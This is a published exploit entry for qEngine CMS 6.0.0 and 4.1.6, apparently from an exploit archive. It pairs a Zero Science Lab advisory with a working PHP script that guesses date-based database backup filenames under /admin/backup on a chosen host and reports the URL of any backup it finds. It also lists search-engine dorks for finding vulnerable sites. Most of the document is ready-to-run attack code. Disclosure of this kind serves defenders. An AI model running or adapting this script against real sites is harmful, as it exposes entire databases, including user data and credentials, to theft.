qEngine CMS 6.0.0 Database Backup Disclosure

Risk: High
Local: No
Remote: Yes

?<?php /* qEngine CMS 6.0.0 Database Backup Disclosure Exploit Vendor: C97net Product web page: http://www.c97.net Affected version: 6.0.0 and 4.1.6 Summary: qEngine (qE) is a lightweight, fast, yet feature packed CMS script to help you building your site quickly. Using template engine to separate the php codes from the design, you don't need to touch the codes to design your web site. qE is also expandable by using modules. Desc: qEngine CMS stores database backups using the Backup DB tool with a predictable file name inside the '/admin/backup' directory as 'Full Backup YYYYMMDD.sql' or 'Full Backup YYYYMMDD.gz', which can be exploited to disclose sensitive information by downloading the file. The '/admin/backup' is also vulnerable to directory listing by default. Tested on: Apache/2.4.7 (Win32) PHP/5.5.6 MySQL 5.6.14 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2014-5172 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5172.php Dork #1: intitle:powered by c97.net Dork #2: intitle:powered by qEngine Dork #3: intitle:powered by Kemana.c97.net Dork #4: intitle:powered by Cart2.c97.net 07.03.2014 */ error_reporting(0); function status($done, $total, $size=20) { static $start_time; if($done > $total) return; if(empty($start_time)) $start_time=time(); $now = time(); $perc=(double)($done/$total); $bar=floor($perc*$size); $disp=number_format($perc*100, 0); $status_bar="\r $disp% ["; $status_bar.=str_repeat("=", $bar); if($bar<$size) { $status_bar.=">"; $status_bar.=str_repeat(" ", $size-$bar); } else { $status_bar.="="; } $status_bar.="] $done/$total"; $rate = ($now-$start_time)/$done; $left = $total - $done; $eta = round($rate * $left, 2); $elapsed = $now - $start_time; $status_bar.= " remaining: ".number_format($eta)." sec. elapsed: ".number_format($elapsed)." sec."; echo "$status_bar "; flush(); if($done == $total) { echo "\n"; } } print " @---------------------------------------------------------------@ | | | qEngine CMS 6.0.0 Database Backup Disclosure Exploit | | | | | | Copyleft (c) 2014, Zero Science Lab | | | | Advisory ID: ZSL-2014-5172 | | www.zeroscience.mk | | | @---------------------------------------------------------------@ "; if ($argc < 4) { print "\n\n [+] Usage: php $argv[0] <host> <port> <dirname>\n\n"; print " [+] Example: php $argv[0] zeroscience.mk 80 hercules\n\n"; die(); } $godina_array = array('2014','2013','2012','2011','2010'); $mesec_array = array('12','11','10','09', '08','07','06','05', '04','03','02','01'); $dn_array = array('31','30','29','28','27','26', '25','24','23','22','21','20', '19','18','17','16','15','14', '13','12','11','10','09','08', '07','06','05','04','03','02', '01'); $host = $argv[1]; $port = intval($argv[2]); $path = $argv[3]; $dbnm = "Full%20Backup%20"; $alert1 = "\033[1;31m"; $alert2 = "\033[0;37m"; $alert3 = "\033[1;32m"; echo "\n [*] Running checks:\n\n"; foreach($godina_array as $godina) { foreach($mesec_array as $mesec) { $x++; status($x, 58); foreach($dn_array as $dn) { $ext=".gz"; if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) { echo "\n"; echo $alert1; print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; echo $alert2; print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; print " Full URL:\x20"; echo $alert3; die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); } $ext=".sql"; if(file_get_contents("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext)) { echo "\n"; echo $alert1; print "\n\n\n !!! DATABASE BACKUP FILE FOUND !!!\n\n"; echo $alert2; print " Filename: 'Full Backup ".$godina.$mesec.$dn.$ext."'\n"; print " Full URL:\x20"; echo $alert3; die("http://".$host.":".$port."/".$path."/admin/backup/".$dbnm.$godina.$mesec.$dn.$ext."\n\n"); } } } } print "\n\n [*] Zero findings!\n\n\n"; ?>



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